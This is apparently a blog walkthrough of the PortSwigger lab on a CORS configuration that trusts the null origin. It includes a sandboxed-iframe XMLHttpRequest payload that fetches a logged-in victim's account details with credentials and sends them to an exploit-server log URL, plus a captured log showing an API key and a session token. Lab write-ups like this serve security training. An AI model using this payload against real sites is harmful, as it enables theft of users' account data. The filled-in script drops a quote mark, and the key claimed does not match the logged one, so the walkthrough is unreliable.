Introduction

Hello friends, this is our second article on CORS vulnerabilities. In this article, we will solve the PortSwigger Web Security official lab titled “CORS vulnerability with trusted null origin” step by step practically.

Lab Description

This lab focuses on an insecure CORS configuration vulnerability that trusts the null origin. To solve this lab, you will need to use JavaScript code that includes CORS and retrieve the administrator key. You can use the credentials “wiener:peter” to log in to the lab.

Lab Solution

Firstly, access the lab. After accessing the lab, use the provided credentials to log in.

Once you have logged in, enable the proxy in Burp and configure it with your browser. Now, click on “My Account” and refresh the page.

You will see a request named “/accountDetails” in the screenshot above. Forward this request to the Repeater tab as we need to test it.

Simply add a header to this request with the name “Origin: null”. You will see that “access-control-allow-origin: null” is shown in the response, indicating that the server has allowed it.

Now, we can exploit this vulnerability.

First, you need to write a script that allows you to retrieve the administrator’s key. Here is the script:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

In the script, replace “YOUR-LAB-ID” with the URL of your lab and “YOUR-EXPLOIT-SERVER-ID” with the URL of your exploit server. Make sure to read the script carefully as it requests the lab and exploit server URLs.

For example, if your lab URL is “https://0adb006a04c1fe5483505125003800fc.web-security-academy.net“, and your exploit server URL is “https://exploit-0a5e0010045ffe40837350790120009c.exploit-server.net“, the modified script will appear as follows:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get',https://0adb006a04c1fe5483505125003800fc.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='https://exploit-0a5e0010045ffe40837350790120009c.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

Once you have stored this code on your exploit server, click on “Deliver exploit to victim”. This delivers the exploit to the victim, who will click on it. Now, click on “Access Log” to check the logs.

In the server log, you will find the following entry:

"GET /log?key=%7B%0A%20%20%22username%22%3A%20%22administrator%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22Ck7TNksY2x0PXkGBBEeh5hksHBCa5H8b%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22GbgfPPpHAiXlz0AmPQ9GcAPxQBSXggXJ%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

From the server logs, you can see that we have obtained the key.

4YvNPWlKYO5Gxdh9v5IQHou460WutRwm

You can now submit this key to complete the PortSwigger Web Security lab for solving the CORS vulnerability with a trusted null origin.

Feel free to explore our website to learn more about web security. We regularly publish the latest articles on various web security topics. Stay connected with us!

FAQS